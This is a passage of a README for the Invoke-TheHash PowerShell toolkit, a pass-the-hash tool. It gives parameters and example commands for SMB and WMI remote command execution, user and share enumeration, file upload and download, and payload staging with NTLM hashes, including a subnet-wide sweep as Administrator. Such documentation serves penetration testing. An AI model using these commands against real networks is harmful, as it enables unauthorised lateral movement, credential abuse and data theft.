Screenshot: 40 | ![wmi](https://cloud.githubusercontent.com/assets/5897462/21598463/7379df8a-d12b-11e6-8e8e-6dc6da4be235.png) 41 | 42 | ### Invoke-SMBExec 43 | * SMB (PsExec) command execution function supporting SMB1, SMB2.1, with and without SMB signing. 44 | 45 | ##### Parameters: 46 | * __Target__ - Hostname or IP address of target. 47 | * __Username__ - Username to use for authentication. 48 | * __Domain__ - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. 49 | * __Hash__ - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format. 50 | * __Command__ - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to SCM on the target. 51 | * __CommandCOMSPEC__ - Default = Enabled: Prepend %COMSPEC% /C to Command. 52 | * __Service__ - Default = 20 Character Random: Name of the service to create and delete on the target. 53 | * __Sleep__ - Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. 54 | * __Version__ - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target. 55 | 56 | ##### Example: 57 | Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose 58 | 59 | ##### Example: 60 | Check SMB signing requirements on target. 61 | Invoke-SMBExec -Target 192.168.100.20 62 | 63 | ##### Screenshot: 64 | ![smb](https://cloud.githubusercontent.com/assets/5897462/21594963/b899ecf2-d0f6-11e6-9bd7-750b218e86a0.png) 65 | 66 | ### Invoke-SMBEnum 67 | * Invoke-SMBEnum performs User, Group, NetSession and Share enumeration tasks over SMB2.1 with and without SMB signing. 68 | 69 | ##### Parameters: 70 | * __Target__ - Hostname or IP address of target. 71 | * __Username__ - Username to use for authentication. 72 | * __Domain__ - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. 73 | * __Hash__ - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format. 74 | * __Action__ - (All,Group,NetSession,Share,User) Default = Share: Enumeration action to perform. 75 | * __Group__ - Default = Administrators: Group to enumerate. 76 | * __Sleep__ - Default = 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. 77 | * __Version__ - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target. Note, only the signing check works with SMB1. 78 | 79 | ##### Example: 80 | Invoke-SMBEnum -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -verbose 81 | 82 | ##### Screenshot: 83 | ![invoke-smbenum](https://user-images.githubusercontent.com/5897462/44761058-b4254280-ab0f-11e8-8607-94e9d73f751c.PNG) 84 | 85 | ### Invoke-SMBClient 86 | * SMB client function supporting SMB2.1 and SMB signing. This function primarily provides SMB file share capabilities for working with hashes that do not have remote command execution privilege. This function can also be used for staging payloads for use with Invoke-WMIExec and Invoke-SMBExec. Note that Invoke-SMBClient is built on the .NET TCPClient and does not use the Windows SMB client. Invoke-SMBClient is much slower than the Windows client. 87 | 88 | ##### Parameters: 89 | * __Username__ - Username to use for authentication. 90 | * __Domain__ - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. 91 | * __Hash__ - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format. 92 | * __Action__ - Default = List: (List/Recurse/Delete/Get/Put) Action to perform. 93 | 1. * List: Lists the contents of a directory. 94 | 1. * Recurse: Lists the contents of a directory and all subdirectories. 95 | 1. * Delete: Deletes a file. 96 | 1. * Get: Downloads a file. 97 | 1. * Put: Uploads a file and sets the creation, access, and last write times to match the source file. 98 | * __Source__ 99 | 1. * List and Recurse: UNC path to a directory. 100 | 1. * Delete: UNC path to a file. 101 | 1. * Get: UNC path to a file. 102 | 1. * Put: File to upload. If a full path is not specified, the file must be in the current directory. When using the 'Modify' switch, 'Source' must be a byte array. 103 | * __Destination__ 104 | 1. * List and Recurse: Not used. 105 | 1. * Delete: Not used. 106 | 1. * Get: If used, value will be the new filename of downloaded file. If a full path is not specified, the file will be created in the current directory. 107 | 1. * Put: UNC path for uploaded file. The filename must be specified. 108 | * __Modify__ 109 | 1. * List and Recurse: The function will output an object consisting of directory contents. 110 | 1. * Delete: Not used. 111 | 1. * Get: The function will output a byte array of the downloaded file instead of writing the file to disk. It's advisable to use this only with smaller files and to send the output to a variable. 112 | 1. * Put: Uploads a byte array to a new destination file. 113 | * __NoProgress__ - Prevents displaying an upload and download progress bar. 114 | * __Sleep__ - Default = 100 Milliseconds: Sets the function's Start-Sleep values in milliseconds. 115 | * __Version__ - Default = Auto: (Auto,1,2.1) Force SMB version. The default behavior is to perform SMB version negotiation and use SMB2.1 if supported by the target. Note, only the signing check works with SMB1. 116 | 117 | ##### Example: 118 | List the contents of a root share directory. 119 | Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Source \\\server\share -verbose 120 | 121 | ##### Example: 122 | Recursively list the contents of a share starting at the root. 123 | Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\\server\share 124 | 125 | ##### Example: 126 | Recursively list the contents of a share subdirectory and return only the contents output to a variable. 127 | $directory_contents = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Recurse -Source \\\server\share\subdirectory -Modify 128 | 129 | ##### Example: 130 | Delete a file on a share. 131 | Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\\server\share\file.txt 132 | 133 | ##### Example: 134 | Delete a file in subdirectories within a share. 135 | Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Delete -Source \\\server\share\subdirectory\subdirectory\file.txt 136 | 137 | ##### Example: 138 | Download a file from a share. 139 | Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\\server\share\file.txt 140 | 141 | ##### Example: 142 | Download a file from within a share subdirectory and set a new filename. 143 | Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\\server\share\subdirectory\file.txt -Destination file.txt 144 | 145 | ##### Example: 146 | Download a file from a share to a byte array variable instead of disk. 147 | $password_file = Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Get -Source \\\server\share\file.txt -Modify 148 | 149 | ##### Example: 150 | Upload a file to a share subdirectory. 151 | Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source file.exe -Destination \\\server\share\subdirectory\file.exe 152 | 153 | ##### Example: 154 | Upload a file to share from a byte array variable. 155 | Invoke-SMBClient -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Action Put -Source $file_byte_array -Destination \\\server\share\file.txt -Modify 156 | 157 | ##### Screenshot: 158 | ![invoke-smbclient](https://user-images.githubusercontent.com/5897462/27063366-4c13cf38-4fbf-11e7-90be-8f7da4f88285.PNG) 159 | 160 | ### Invoke-TheHash 161 | * Function for running Invoke-TheHash functions against multiple targets. 162 | 163 | ##### Parameters: 164 | * __Type__ - Sets the desired Invoke-TheHash function. Set to either SMBClient, SMBEnum, SMBExec, or WMIExec. 165 | * __Target__ - List of hostnames, IP addresses, CIDR notation, or IP ranges for targets. 166 | * __TargetExclude__ - List of hostnames, IP addresses, CIDR notation, or IP ranges to exclude from the list or targets. 167 | * __PortCheckDisable__ - (Switch) Disable WMI or SMB port check. Since this function is not yet threaded, the port check serves to speed up he function by checking for an open WMI or SMB port before attempting a full synchronous TCPClient connection. 168 | * __PortCheckTimeout__ - Default = 100: Set the no response timeout in milliseconds for the WMI or SMB port check. 169 | * __Username__ - Username to use for authentication. 170 | * __Domain__ - Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. 171 | * __Hash__ - NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. 172 | * __Command__ - Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI or SCM on the target. 173 | * __CommandCOMSPEC__ - Default = Enabled: SMBExec type only. Prepend %COMSPEC% /C to Command. 174 | * __Service__ - Default = 20 Character Random: SMBExec type only. Name of the service to create and delete on the target. 175 | * __SMB1__ - (Switch) Force SMB1. SMBExec type only. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target. 176 | * __Sleep__ - Default = WMI 10 Milliseconds, SMB 150 Milliseconds: Sets the function's Start-Sleep values in milliseconds. 177 | 178 | ##### Example: 179 | Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 180 | 181 | ##### Screenshot: 182 | ![ithsmb](https://cloud.githubusercontent.com/assets/5897462/21594966/c0f69a62-d0f6-11e6-91f2-af9103571bde.png) 183 | 184 | --------------------------------------------------------------------------------